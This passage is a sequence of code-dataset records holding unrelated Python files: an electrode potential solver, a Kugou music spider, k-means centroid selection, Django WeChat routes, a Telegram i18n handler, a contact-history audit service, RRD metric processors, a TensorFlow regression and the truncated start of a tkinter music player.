at.. what is that fraction and what is that relative to the plate size?\n U_temp = np.empty((len(range_z), len(range_x)))\n U_before = np.empty((len(range_z), len(range_x)))\n U_temp.fill(Uguess)\n\n #Set BC\n ## Plates are finite, establish size\n rad_plate = 50.8e-3\n\n near_side = int(round((1.0/2.0*len(range_x)- rad_plate/delta)))\n far_side = int(round((1.0/2.0*len(range_x)+ rad_plate/delta)))\n\n U_temp[(len(range_z)-1):,near_side:far_side] = Utop\n U_temp[:1, near_side:far_side] = Ubottom\n U_temp[:, (len(range_x)-1):] = Uright\n U_temp[:, :1] = Uleft\n\n ##Making holes in plates\n first_half = int(round((1.0/2.0*len(range_x)- hole_radii/delta)))\n second_half = int(round((1.0/2.0*len(range_x)+ hole_radii/delta)))\n\n U_temp[(len(range_z)-1):,first_half:second_half] = 0\n U_temp[:1, first_half:second_half] = 0\n\n # Iteration\n print(\"Please wait for a moment\")\n conv = 3\n count = 0\n while conv > 2:\n conv = np.sum(np.abs(U_temp[:,:]-U_before[:,:]))\n print(conv)\n U_before[:,:] = U_temp[:,:]\n for j in range(1, len(range_x)-1):\n for i in range(1, len(range_z)-1):\n U_temp[i, j] = (1-fopt) * U_temp[i, j] + fopt*.25*(U_temp[i+1][j] + U_temp[i-1][j] + U_temp[i][j+1]+ U_temp[i][j-1])\n\n for j in range(1, len(range_x)-1)[::-1]:\n for i in range(1, len(range_z)-1)[::-1]:\n U_temp[i, j] = (1-fopt) * U_temp[i, j] + fopt*.25*(U_temp[i+1][j] + U_temp[i-1][j] + U_temp[i][j+1] + U_temp[i][j-1])\n #T[i,j] = .25*(T[i+1][j] + T[i-1][j] + T[i][j+1]+ T[i][j-1])\n count += 1\n\n #Storing potential array in larger array\n U[(len(range_z_largest)-len(range_z))/2:(len(range_z_largest)+len(range_z))/2,:,k] = U_temp[:,:]\n\nelapsed = time.time() - start\n\n\n\nprint(\"Iteration finished after {} iterations and took {} seconds\".format(count, elapsed))\n\n\n\n\nfile = h5py.File('data/split_electrode/numerical_split_electrode_test_vary_sep_test.h5'.format(count), 'w')\nfile.create_dataset('X', data=X)\nfile.create_dataset('Z', data=Z)\nfile.create_dataset('V_o', data=V_o)\nfile.create_dataset('lenX', data= lenX)\nfile.create_dataset('lenZ', data=lenZ)\nfile.create_dataset('potential', data=U)\nfile.create_dataset('delta', data=delta)\nfile.create_dataset('disk_radii',data=rad_plate )\nfile.create_dataset('hole_radii', data=hole_radii)\nfile.create_dataset('time_elapsed', data=elapsed)\nfile.create_dataset('disk_separation',data=sep)\nfile.close()\n","sub_path":"code/fea_electrodes/python_scripts/fea_split_electrode_plate_sep.py","file_name":"fea_split_electrode_plate_sep.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"50309234","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport time\nimport json\nfrom myweibo.spiders.kugoufz import hhgg\nfrom myweibo.items import MyweiboItem\n\nclass KugouSpider(scrapy.Spider):\n name = 'kugou'\n allowed_domains = ['www.kugou.com']\n start_urls = ['https://wwwapi.kugou.com']\n\n def parse(self, response):\n print('1、单首歌,2、歌手或歌曲类型')\n num = input('请选择搜索类型:')\n ttt = True\n while ttt:\n if num == '1' or num == '2':\n ttt = False\n else:\n print('1、单首歌,2、歌手或歌曲类型')\n print()\n num = input('输入的不符合规则,请选择搜索类型:')\n print(num)\n if num == '1':\n title = input('请输入歌曲名称:')\n else:\n title = input('请输入歌手或歌曲类型:')\n print(title)\n mn = hhgg().hg(num,title)\n print(mn)\n for j in mn:\n item = MyweiboItem()\n item['title'] = '/mp3/'+j[1]+'-'+j[0]+'.mp3'\n item['url'] = [j[2]]\n yield item\n\n\n\nfrom scrapy.crawler import CrawlerProcess #导入CrawlerProcess类\nfrom 
scrapy.utils.project import get_project_settings # import the project-settings helper\n\nif __name__ == '__main__': # program entry point\n process = CrawlerProcess(get_project_settings()) # create a CrawlerProcess and pass it the project settings\n process.crawl('kugou') # name of the spider to start\n process.start() # start the spider\n","sub_path":"bao/kugou.py","file_name":"kugou.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} {"seq_id":"28070797","text":"\"\"\"\n - sample size as a ratio of our full dataset\n - random state for reproducibility\n - number of clusters (k) for our dataset\n - number of iterations (n) for our k-means algorithm\n - number of attempts at finding our best chance initial centroids while clustering on our sample dataset\n\n\"\"\"\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nimport numpy as np\nimport pandas as pd\n\n# target holds the predicted labels for x_train / labels holds the true labels\ndef matrics_function(target, labels):\n species = np.chararray(target.shape, itemsize=150)\n for i in range(len(target)):\n if target[i] == 0:\n species[i] = 'setosa'\n elif target[i] == 1:\n species[i] = 'versicolor'\n elif target[i] == 2:\n species[i] = 'virginica'\n\n df = pd.DataFrame({'labels': labels, 'species': species})\n ct = pd.crosstab(df['labels'], df['species'])\n\n return ct\n\nclass color:\n PURPLE = '\\033[95m'\n CYAN = '\\033[96m'\n DARKCYAN = '\\033[36m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n\n# Some variables\nRANDOM_STATE = 42\nNUM_CLUSTERS = 2\nNUM_ITER = 100\n\nprint(color.BOLD+\"\\nLoading data\"+color.END)\ndata = pd.read_csv(\"dataset/Unknown_data.csv\")\n#data = data.sample(frac=0.1, random_state=43)\ny = data['Label']\nX = data.drop(['Label'], axis=1).to_numpy()\n#std_scaler = StandardScaler()\n#fitted = std_scaler.fit(X)\n#X = std_scaler.transform(X)\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n\n# run k-means training\ncents_list = []\ninert_list = []\n\nkm = KMeans(n_clusters=NUM_CLUSTERS, init='random', max_iter=1, n_init=1)\nkm.fit(X_train)\ninertia = km.inertia_\ncents = km.cluster_centers_\ncents_list.append(cents)\ninert_list.append(inertia)\n\nprint(color.BOLD+\"\\nFinding initial centroids\"+color.END)\nfor iter in range(NUM_ITER):\n km = KMeans(n_clusters=NUM_CLUSTERS, init=cents, max_iter=1, n_init=1)\n km.fit(X_train)\n #print('Iteration: ', iter)\n #print('Inertia:', km.inertia_)\n cc = km.cluster_centers_.tolist()\n print('Centroids:', cc)\n inertia = km.inertia_\n cents = km.cluster_centers_\n\n cents_list.append(cents)\n inert_list.append(inertia)\n\n# Get best centroids to use for full clustering\nbest_cents = cents_list[inert_list.index(min(inert_list))]\nprint(\"\\nbest centroids to use for full clustering\")\nprint(best_cents.tolist())","sub_path":"201111_based_ml/best_centroid.py","file_name":"best_centroid.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} {"seq_id":"106189227","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.conf.urls import url\nfrom wechat import views\n\nurlpatterns = [\n # handle messages and events sent to the official account\n url(\n r'^server/(?P<appid>[0-9a-z_]+)/?$',\n views.ProcessServerEventView.as_view(),\n name='wechat-server_messages'\n ),\n # fetch the authorization link\n url(\n r'^auth/?$',\n 
views.WechatAuthPageView.as_view(),\n name='wechat-auth'\n ),\n # called by the WeChat server after the official account authorizes successfully\n url(\n r'^authorized/?$',\n views.WechatAuthSuccessPageView.as_view(),\n name='wechat-authorized'\n ),\n # URL that receives authorization events\n url(\n r'^callback/?$',\n views.AuthEventProcessView.as_view(),\n name='wechat-component-verify-ticket'\n )\n]\n","sub_path":"demo/wechat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} {"seq_id":"183209211","text":"from . import strings_en\nfrom . import strings_zh_hans\nfrom . import strings_zh_hant\n\nfrom .. import db\n\n_strings_all = {\n 'en': strings_en,\n 'zh-hans': strings_zh_hans,\n 'zh-hant': strings_zh_hant\n}\n\nlanguages = {'en': 'English', 'zh-hans': '简体中文', 'zh-hant': '繁體中文'}\n\n\ndef I18nHandler(database: db.Database):\n def withi18n(func):\n async def wrapper(event):\n if not event.is_private:\n return await func(event=event, strings=strings_en)\n\n user = await event.get_chat()\n strings_telegram = _strings_all[user.lang_code] \\\n if user.lang_code in _strings_all else strings_en\n\n # When a user /start the bot for the 1st time\n if database.get_user_state(user) is None:\n return await func(event=event, strings=strings_telegram)\n\n db_lang = database.get_user_lang(user.id)\n if db_lang in ['follow', None]:\n return await func(event=event, strings=strings_telegram)\n return await func(event=event, strings=_strings_all[db_lang])\n\n return wrapper\n\n return withi18n\n","sub_path":"tgficbot/i18n/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} {"seq_id":"4287695","text":"#!/usr/bin/env python\n#***************************************************************************/\n#*\n#* Copyright (c) 2007 Vonage Holdings Corp.\n#* All rights reserved.\n#*\n#*\n#***************************************************************************/\n#\n\n\"\"\"\nContact History\n===============\n\tThe Contact History service lets you view changes to a given contact over time.\n\n\tOverview\n\t--------\n\t - B{Version}\n\t\t- 1.0.0\n\t - B{SVN Revision}\n\t\t- $Revision: 373313 $\n\t - B{Method}\n\t\t- HTTP GET\n\t - B{Required get parameters}\n\t\t- contact_id\n\t - B{Optional get parameters}\n\t\t- contact_owner_id\n\t - B{Returns}\n\t\t- HTTP 200 - On success, with XML response body.\n\t\t- HTTP 403 - When insufficient parameters are passed in to the service\n\t\t- HTTP 500 - Server error, exception information and stack trace in XML response body\n\t - B{Routes}\n\t\t- /history/summary/contact/:contact_id\n\n\tExamples\n\t--------\n\n\tHistory\n\t-------\n\t - Created: Raymond Cohen 06/09/2008\n\"\"\"\n\n\nfrom vonage.dispatcher.handler import Handler\nfrom vonage.util.vonxmlserializer import XMLSerializer\nfrom contact_manager.xml_models import *\nfrom vonage.util.rest_utils import RestClientError, RestDatabaseNotFound, RestDatabaseError\nfrom vonage.util.data_utils import strip_param_dict\n\nimport xml.dom.minidom\nfrom xml import xpath\n\nDEFAULT_SERVICE_ENVELOPE_VERSION = 1.0\nSERVICE_ATTRIBUTES = {'name': 'contact_history',\n\t'version': str(DEFAULT_SERVICE_ENVELOPE_VERSION),\n\t'revision': '$Revision: 373313 $'}\n\nDELETE = \"DELETE\"\n#position of each id in the enormous SQL select\nCONTACT_ID = 1\nADDRESS_ID = 10\nEMAIL_ID = 20\nIM_ID = 26\nNOTE_ID = 32\nOTHER_ID = 37\nPHONE_ID = 42\nURI_ID = 49\n
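# e.g. in the joined row built by get_contact_history below, columns 1-9 hold the\n# contact fields and columns 10-19 the address fields; each *_ID constant marks\n# the id column where one child record's slice of the row begins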
\ndef has_id(arr, an_id):\n\tfor el in arr:\n\t\tif el.__id__ == an_id:\n\t\t\treturn True\n\treturn False\n\ndef has_replaced_on(arr, a_date):\n\tfor el in arr:\n\t\tif el.__replaced_on__ == a_date:\n\t\t\treturn True\n\treturn False\n\nclass ReturnObject(XMLSerializer):\n\tdef __init__(self):\n\t\tself.revisions = []\n\nclass ContactHandler(Handler):\n\t\"\"\"Encapsulates service request handling logic\"\"\"\n\tdef __init__(self):\n\t\tHandler.__init__(self, DEFAULT_SERVICE_ENVELOPE_VERSION)\n\t\tself.required_get_args_choose_one = ['contact_id']\n\t\tself.optional_get_args = ['contact_owner_id']\n\n\tdef get(self, http, req_dict):\n\t\tc_id = req_dict['contact_id']\n\t\tco_id = req_dict.get('contact_owner_id')\n\n\t\tresult = self.get_contact_history(c_id, co_id)\n\t\tif not result:\n\t\t\traise RestDatabaseNotFound(\"No matching contacts found\")\n\n\t\tret_obj = ReturnObject()\n\t\tret_obj.contact = result\n\t\treturn ret_obj.dumps(SERVICE_ATTRIBUTES)\n\n\tdef get_contact_history(self, contact_id, contact_owner_id):\n\t\tparams = {'contact_owner_id': contact_owner_id, 'contact_id': contact_id}\n\n\t\tsql = \"\"\"\n\t\tSELECT to_char(c.audit_date, 'YYYY-MM-DD HH24:MI:SS.MS'),\n\n\t\t\tc.id, c.first_name, c.middle_name, c.last_name, c.nick_name, c.title, c.suffix,\n\t\t\tc.audit_operation, to_char(c.modify_date, 'YYYY-MM-DD HH24:MI:SS.MS'),\n\n\t\t\tca.id, ca.address_type, ca.description, ca.address, ca.city, ca.state, ca.country, ca.postcode,\n\t\t\tca.audit_operation, to_char(ca.modify_date, 'YYYY-MM-DD HH24:MI:SS.MS'),\n\n\t\t\tce.id, ce.email_type, ce.description, ce.email_address,\n\t\t\tce.audit_operation, to_char(ce.modify_date, 'YYYY-MM-DD HH24:MI:SS.MS'),\n\n\t\t\tcim.id, cim.description, cim.im_service, cim.im_username,\n\t\t\tcim.audit_operation, to_char(cim.modify_date, 'YYYY-MM-DD HH24:MI:SS.MS'),\n\n\t\t\tcn.id, cn.description, cn.note,\n\t\t\tcn.audit_operation, to_char(cn.modify_date, 'YYYY-MM-DD HH24:MI:SS.MS'),\n\n\t\t\tco.id, co.description, co.data,\n\t\t\tco.audit_operation, to_char(co.modify_date, 'YYYY-MM-DD HH24:MI:SS.MS'),\n\n\t\t\tctn.id, ctn.telephone_type, ctn.description, ctn.display_number, ctn.phone_number,\n\t\t\tctn.audit_operation, to_char(ctn.modify_date, 'YYYY-MM-DD HH24:MI:SS.MS'),\n\n\t\t\tcu.id, cu.uri_type, cu.description, cu.uri,\n\t\t\tcu.audit_operation, to_char(cu.modify_date, 'YYYY-MM-DD HH24:MI:SS.MS')\n\n\t\tFROM contacts_audit c\n\t\t\tLEFT OUTER JOIN contact_addresses_audit ca ON (c.id = ca.contact_id AND c.audit_date = ca.audit_date)\n\t\t\tLEFT OUTER JOIN contact_emails_audit ce ON (c.id = ce.contact_id AND c.audit_date = ce.audit_date)\n\t\t\tLEFT OUTER JOIN contact_instant_messengers_audit cim ON (c.id = cim.contact_id AND c.audit_date = cim.audit_date)\n\t\t\tLEFT OUTER JOIN contact_notes_audit cn ON (c.id = cn.contact_id AND c.audit_date = cn.audit_date)\n\t\t\tLEFT OUTER JOIN contact_others_audit co ON (c.id = co.contact_id AND c.audit_date = co.audit_date)\n\t\t\tLEFT OUTER JOIN contact_telephone_numbers_audit ctn ON (c.id = ctn.contact_id AND c.audit_date = ctn.audit_date)\n\t\t\tLEFT OUTER JOIN contact_uris_audit cu ON (c.id = cu.contact_id AND c.audit_date = cu.audit_date)\n\t\tWHERE\n\t\t\"\"\"\n\n\t\tothers = False\n\t\tif contact_id:\n\t\t\tsql += \"c.id = %(contact_id)s\"\n\t\t\tothers = True\n\n\t\tif contact_owner_id:\n\t\t\tif others:\n\t\t\t\tsql += \" and \"\n\t\t\tsql += \"c.contact_owner_id = %(contact_owner_id)s\"\n\n\t\tsql += \" ORDER BY c.audit_date\"\n\n\t\tconn = self.get_connection('contactmanager')\n\t\tcurs = conn.cursor()\n\t\tcurs = self.execute_query(curs, sql, strip_param_dict(params))\n\t\trows = curs.fetchall()\n
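\n\t\t# each fetched row is one denormalized snapshot: the contact columns plus one\n\t\t# (possibly NULL) slice from every joined child table for the same audit_date;\n\t\t# the loop below folds these rows into a single Contact object per audit_date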
\n\t\thistories = {}\n\t\tfor row in rows:\n\t\t\tself.process_row(row, histories)\n\n\t\treturn histories.values()\n\n\tdef process_row(self, row, contacts):\n\t\t\"\"\"adds new information in row to the contacts hash\"\"\"\n\n\t\tself.process_contact_basics(row, contacts) # this one must be first\n\n\t\tc = contacts[row[0]]\n\t\tc.__audit_date__ = row[0] + \" +0000\"\n\t\tself.process_contact_addresses(row, c)\n\t\tself.process_contact_emails(row, c)\n\t\tself.process_contact_instant_messengers(row, c)\n\t\tself.process_contact_notes(row, c)\n\t\tself.process_contact_others(row, c)\n\t\tself.process_contact_telephone_numbers(row, c)\n\t\tself.process_contact_uris(row, c)\n\n\tdef process_contact_basics(self, row, contacts):\n\t\tif row[0] and not contacts.has_key(row[0]): # this is using the TRANSACTION_DATE\n\t\t\tcontacts[row[0]] = self.contact_basics_from_row(row, CONTACT_ID)\n\n\tdef process_contact_addresses(self, row, contact):\n\t\tif row[ADDRESS_ID] and not has_id(contact.contact_address, row[ADDRESS_ID]):\n\t\t\tca = self.contact_address_from_row(row, ADDRESS_ID)\n\t\t\tcontact.contact_address.append(ca)\n\n\tdef process_contact_emails(self, row, contact):\n\t\tif row[EMAIL_ID] and not has_id(contact.contact_email, row[EMAIL_ID]):\n\t\t\tce = self.contact_email_from_row(row, EMAIL_ID)\n\t\t\tcontact.contact_email.append(ce)\n\n\tdef process_contact_instant_messengers(self, row, contact):\n\t\tif row[IM_ID] and not has_id(contact.contact_instant_messenger, row[IM_ID]):\n\t\t\tcim = self.contact_instant_messenger_from_row(row, IM_ID)\n\t\t\tcontact.contact_instant_messenger.append(cim)\n\n\tdef process_contact_notes(self, row, contact):\n\t\tif row[NOTE_ID] and not has_id(contact.contact_note, row[NOTE_ID]):\n\t\t\tcn = self.contact_note_from_row(row, NOTE_ID)\n\t\t\tcontact.contact_note.append(cn)\n\n\tdef process_contact_others(self, row, contact):\n\t\tif row[OTHER_ID] and not has_id(contact.contact_other, row[OTHER_ID]):\n\t\t\tco = self.contact_other_from_row(row, OTHER_ID)\n\t\t\tcontact.contact_other.append(co)\n\n\tdef process_contact_telephone_numbers(self, row, contact): # also handles speed_dials\n\t\tif row[PHONE_ID] and not has_id(contact.contact_telephone_number, row[PHONE_ID]):\n\t\t\tctn = self.contact_telephone_number_from_row(row, PHONE_ID)\n\t\t\tcontact.contact_telephone_number.append(ctn)\n\n\tdef process_contact_uris(self, row, contact):\n\t\tif row[URI_ID] and not has_id(contact.contact_uri, row[URI_ID]):\n\t\t\tcu = self.contact_uri_from_row(row, URI_ID)\n\t\t\tcontact.contact_uri.append(cu)\n\n\tdef contact_basics_from_row(self, row, offset = 0):\n\t\tc = Contact()\n\t\tc.__id__ = row[offset]\n\t\tc.first_name = row[offset + 1]\n\t\tc.middle_name = row[offset + 2]\n\t\tc.last_name = row[offset + 3]\n\t\tc.nick_name = row[offset + 4]\n\t\tc.title = row[offset + 5]\n\t\tc.suffix = row[offset + 6]\n\n\t\tif row[offset + 7] and DELETE == row[offset + 7]:\n\t\t\tc.__deleted__ = \"true\"\n\t\tc.modify_date = row[offset + 8] + \" +0000\"\n\n\t\treturn c\n\n\tdef contact_uri_from_row(self, row, offset = 0):\n\t\tcu = ContactUri()\n\t\tcu.__id__ = row[offset]\n\t\tcu.uri_type = row[offset + 1]\n\t\tcu.description = row[offset + 2]\n\t\tcu.uri = row[offset + 3]\n\n\t\tif row[offset + 4] and DELETE == row[offset + 4]:\n\t\t\tcu.__deleted__ = \"true\"\n\t\tcu.modify_date = row[offset + 5] + \" +0000\"\n\n\t\treturn cu\n\n\tdef contact_other_from_row(self, row, offset = 0):\n\t\tco = 
ContactOther()\n\t\tco.__id__ = row[offset]\n\t\tco.description = row[offset + 1]\n\t\tco.data = row[offset + 2]\n\n\t\tif row[offset + 3] and DELETE == row[offset + 3]:\n\t\t\tco.__deleted__ = \"true\"\n\t\tco.modify_date = row[offset + 4] + \" +0000\"\n\n\t\treturn co\n\n\tdef contact_note_from_row(self, row, offset = 0):\n\t\tcn = ContactNote()\n\t\tcn.__id__ = row[offset]\n\t\tcn.description = row[offset + 1]\n\t\tcn.note = row[offset + 2]\n\n\t\tif row[offset + 3] and DELETE == row[offset + 3]:\n\t\t\tcn.__deleted__ = \"true\"\n\t\tcn.modify_date = row[offset + 4] + \" +0000\"\n\n\t\treturn cn\n\n\tdef contact_telephone_number_from_row(self, row, offset = 0):\n\t\tctn = ContactTelephoneNumber()\n\t\tctn.__id__ = row[offset]\n\t\tctn.telephone_type = row[offset + 1]\n\t\tctn.description = row[offset + 2]\n\t\tctn.display_number = row[offset + 3]\n\t\tctn.phone_number = row[offset + 4]\n\n\t\tif row[offset + 5] and DELETE == row[offset + 5]:\n\t\t\tctn.__deleted__ = \"true\"\n\t\tctn.modify_date = row[offset + 6] + \" +0000\"\n\n\t\treturn ctn\n\n\tdef contact_email_from_row(self, row, offset = 0):\n\t\tce = ContactEmail()\n\t\tce.__id__ = row[offset]\n\t\tce.email_type = row[offset + 1]\n\t\tce.description = row[offset + 2]\n\t\tce.email_address = row[offset + 3]\n\n\t\tif row[offset + 4] and DELETE == row[offset + 4]:\n\t\t\tce.__deleted__ = \"true\"\n\t\tce.modify_date = row[offset + 5] + \" +0000\"\n\n\t\treturn ce\n\n\tdef contact_address_from_row(self, row, offset = 0):\n\t\tca = ContactAddress()\n\t\tca.__id__ = row[offset]\n\t\tca.address_type = row[offset + 1]\n\t\tca.description = row[offset + 2]\n\t\tca.address = row[offset + 3]\n\t\tca.city = row[offset + 4]\n\t\tca.state = row[offset + 5]\n\t\tca.country = row[offset + 6]\n\t\tca.postcode = row[offset + 7]\n\n\t\tif row[offset + 8] and DELETE == row[offset + 8]:\n\t\t\tca.__deleted__ = \"true\"\n\t\tca.modify_date = row[offset + 9] + \" +0000\"\n\n\t\treturn ca\n\n\tdef contact_instant_messenger_from_row(self, row, offset = 0):\n\t\tcim = ContactInstantMessenger()\n\t\tcim.__id__ = row[offset]\n\t\tcim.description = row[offset + 1]\n\t\tcim.im_service = row[offset + 2]\n\t\tcim.im_username = row[offset + 3]\n\n\t\tif row[offset + 4] and DELETE == row[offset + 4]:\n\t\t\tcim.__deleted__ = \"true\"\n\t\tcim.modify_date = row[offset + 5] + \" +0000\"\n\n\t\treturn cim\n\n\tdef routes(self, routemap, key):\n\t\tself.connect_route(routemap, \"/history/summary/contact/:contact_id\", key)\n\n","sub_path":"contact_manager/contact_history.py","file_name":"contact_history.py","file_ext":"py","file_size_in_byte":10606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"155407551","text":"# Python 2 / 3 compatibility\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport collections\nimport logging\n\nfrom . 
import config\n\n\nMetric = collections.namedtuple(\n \"Metric\",\n (\"reference\", \"timestamp\", \"interval_seconds\", \"value\", \"rate\", \"delta\",\n \"type\")\n)\n\n\n# Absolute -> time, interval, raw, rate=raw/interval\n# Gauge -> time, interval, raw, rate=raw\n# Counter -> time, interval, raw, delta=raw-old[rollover], rate=delta/interval\n# Derive -> time, interval, raw, delta=raw-old, rate=delta/interval\n\n\nclass MetricProcessor(object):\n\n __slots__ = (\"config_item\", \"last_timestamp\", \"last_raw_value\")\n\n TYPE = None\n\n def __init__(self, config_item):\n self.config_item = config_item\n self.last_timestamp = None\n self.last_raw_value = None\n\n def __call__(self, raw_file_line):\n assert self.reference == raw_file_line.reference\n if self.reference != raw_file_line.reference:\n return None\n\n new_value = None\n if raw_file_line.value != config.VAL_UNKNOWN:\n new_value = self.parse_value(raw_file_line.value)\n\n interval_seconds = None\n new_timestamp = raw_file_line.timestamp\n if self.last_timestamp is not None:\n interval_seconds = new_timestamp - self.last_timestamp\n\n rate, delta = \\\n self.process(interval_seconds, self.last_raw_value, new_value)\n rate = self.apply_limits(rate)\n\n self.last_timestamp = new_timestamp\n self.last_raw_value = new_value\n\n return Metric(\n raw_file_line.reference, new_timestamp, interval_seconds, new_value,\n rate, delta, self.TYPE\n )\n\n @classmethod\n def parse_value(cls, value):\n if value == '':\n return None\n try:\n return int(value)\n except ValueError:\n try:\n return float(value)\n except ValueError:\n logger = logging.getLogger()\n logger.warning(\"Invalid raw value : %s\", value)\n\n def process(self, interval_seconds, last_raw_value, new_value):\n raise NotImplementedError()\n\n @property\n def reference(self):\n return self.config_item.reference\n\n @property\n def min(self):\n return self.config_item.min\n\n @property\n def max(self):\n return self.config_item.max\n\n # See rrdtool/src/rrd_update.c update_pdp_prep\n def apply_limits(self, rate):\n if rate is not None:\n if self.max != config.VAL_UNKNOWN and rate > self.max:\n rate = None\n elif self.min != config.VAL_UNKNOWN and rate < self.min:\n rate = None\n return rate\n\n\nclass FloatMetricProcessor(MetricProcessor):\n\n def process(self, interval_seconds, last_raw_value, new_value):\n raise NotImplementedError()\n\n\n# See rrdtool/src/rrd_update.c update_pdp_prep case DST_ABSOLUTE\nclass AbsoluteMetricProcessor(FloatMetricProcessor):\n\n TYPE = config.VAL_ABSOLUTE\n\n #newval = rrd_strtodbl()\n #rate = newval / interval;\n\n def process(self, interval_seconds, last_raw_value, new_value):\n rate = None\n if interval_seconds is not None and new_value is not None:\n rate = new_value / interval_seconds\n return rate, None\n\n\n# See rrdtool/src/rrd_update.c update_pdp_prep case DST_GAUGE\nclass GaugeMetricProcessor(FloatMetricProcessor):\n\n TYPE = config.VAL_GAUGE\n\n #newval = rrd_strtodbl()\n #rate = newval;\n\n def process(self, interval_seconds, last_raw_value, new_value):\n rate = new_value\n return rate, None\n\n\n# See rrdtool/src/rrd_diff.c rrd_diff\nclass IntegerMetricProcessor(MetricProcessor):\n\n @classmethod\n def parse_value(cls, value):\n value = super(IntegerMetricProcessor, cls).parse_value(value)\n if value is not None and isinstance(value, float):\n # Truncate float value just like rrd_diff does\n value = int(value)\n return value\n\n def process(self, interval_seconds, last_raw_value, new_value):\n raise NotImplementedError()\n\n\n# See 
rrdtool/src/rrd_update.c update_pdp_prep case DST_COUNTER\n# rrd_diff.c rrd_diff\nclass CounterMetricProcessor(IntegerMetricProcessor):\n\n TYPE = config.VAL_COUNTER\n\n #pdp_new[ds_idx] = rrd_diff() [truncate floats]\n #if (pdp_new[ds_idx] < (double) 0.0)\n #pdp_new[ds_idx] += (double) 4294967295.0; /* 2^32-1 */\n #if (pdp_new[ds_idx] < (double) 0.0)\n #pdp_new[ds_idx] += (double) 18446744069414584320.0; /* 2^64-2^32 */\n #rate = pdp_new[ds_idx] / interval;\n\n def process(self, interval_seconds, last_raw_value, new_value):\n rate = None\n delta = None\n if last_raw_value is not None and new_value is not None:\n delta = new_value - last_raw_value\n if delta < 0:\n delta += 4294967295 # 2^32-1\n if delta < 0:\n delta += 18446744069414584320 # 2^64-2^32\n rate = delta / interval_seconds\n return rate, delta\n
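\n # worked example of the wrap handling above (illustrative values): for a 32-bit\n # counter, last_raw_value=4294967290 and new_value=5 give delta=-4294967285;\n # adding 2^32-1 brings delta to 10, so rate = 10 / interval_seconds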
\n\n# See rrdtool/src/rrd_update.c update_pdp_prep case DST_DERIVE\n# rrd_diff.c rrd_diff\nclass DeriveMetricProcessor(IntegerMetricProcessor):\n\n TYPE = config.VAL_DERIVE\n\n #pdp_new[ds_idx] = rrd_diff() [truncate floats]\n #rate = pdp_new[ds_idx] / interval;\n\n def process(self, interval_seconds, last_raw_value, new_value):\n rate = None\n delta = None\n if last_raw_value is not None and new_value is not None:\n delta = new_value - last_raw_value\n if interval_seconds > 0:\n rate = delta / interval_seconds\n return rate, delta\n","sub_path":"rrdbot/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} {"seq_id":"636140656","text":"import numpy as np\nimport tensorflow as tf\n\nx = np.random.normal(0, 1, [1000, 1])\ny = 2*x + 1 + np.random.normal(0, 0.1, [1000, 1])\n\n\n# x, y\n# y = wx+b\n\nx_in = tf.placeholder(tf.float64, [5, 1])\ny_in = tf.placeholder(tf.float64, [5, 1])\nw = tf.Variable(np.random.random([1, 1]))\nb = tf.Variable(np.random.random([1]))\ny_out = tf.matmul(x_in, w) + b\nloss = tf.reduce_mean(tf.square(y_in - y_out))\n# one plain SGD step (learning rate 0.1) minimizing the MSE loss above\nstep = tf.train.GradientDescentOptimizer(0.1).minimize(loss)\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nfor itr in range(500):\n idx = np.random.randint(0, 1000, 5)\n #print(np.shape(x[idx]))\n sess.run(step, feed_dict={x_in:x[idx], y_in:y[idx]})\n if itr%10 == 0:\n print(sess.run([loss, w.value(), b.value()], feed_dict={x_in:x[idx], y_in:y[idx]}))","sub_path":"1.14_courses/Basic/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} {"seq_id":"30236144","text":"import os\r\nfrom tkinter import *\r\nimport tkinter.messagebox\r\nfrom pygame import mixer\r\nfrom mutagen.mp3 import MP3\r\nfrom tkinter import filedialog\r\nimport time\r\nimport threading\r\nfrom ttkthemes import themed_tk as tk\r\nfrom tkinter import ttk\r\n\r\n\r\n\r\n#root window contains the status bar\r\n''' the root contains both the left and right frames.\r\nThe right frame contains top, middle and bottom frames,\r\nwhile the left frame contains the current playlist'''\r\nroot =tk.ThemedTk()\r\nroot.get_themes()\r\nroot.set_theme('black')\r\nroot.config(bg= 'grey')\r\nmixer.init() # initializing the mixer\r\n\r\n\r\nroot.title('Kio_studio')\r\nroot.iconbitmap(r'images/wave.ico')\r\n# root.geometry('300x300')\r\n\r\n# create the menu bar\r\nmenu_bar = Menu(root)\r\nroot.config(menu=menu_bar)\r\n# create submenu\r\nsub_menu = Menu(menu_bar, tearoff=0)\r\nmenu_bar.add_cascade(label='File', menu=sub_menu)\r\n\r\ndef browse_file():\r\n global filename_path\r\n filenames_path = filedialog.askopenfilenames()\r\n for i in filenames_path:\r\n filename_path= i\r\n add_to_playlist(filename_path)\r\n\r\n\r\nsub_menu.add_command(label='Open', command=browse_file)\r\nsub_menu.add_command(label='Exit', command=root.destroy)\r\n\r\n\r\n\r\nstatus_bar = ttk.Label(root, text='Welcome to Kio\\'s Studio', anchor=W, relief=SUNKEN, font=' Times 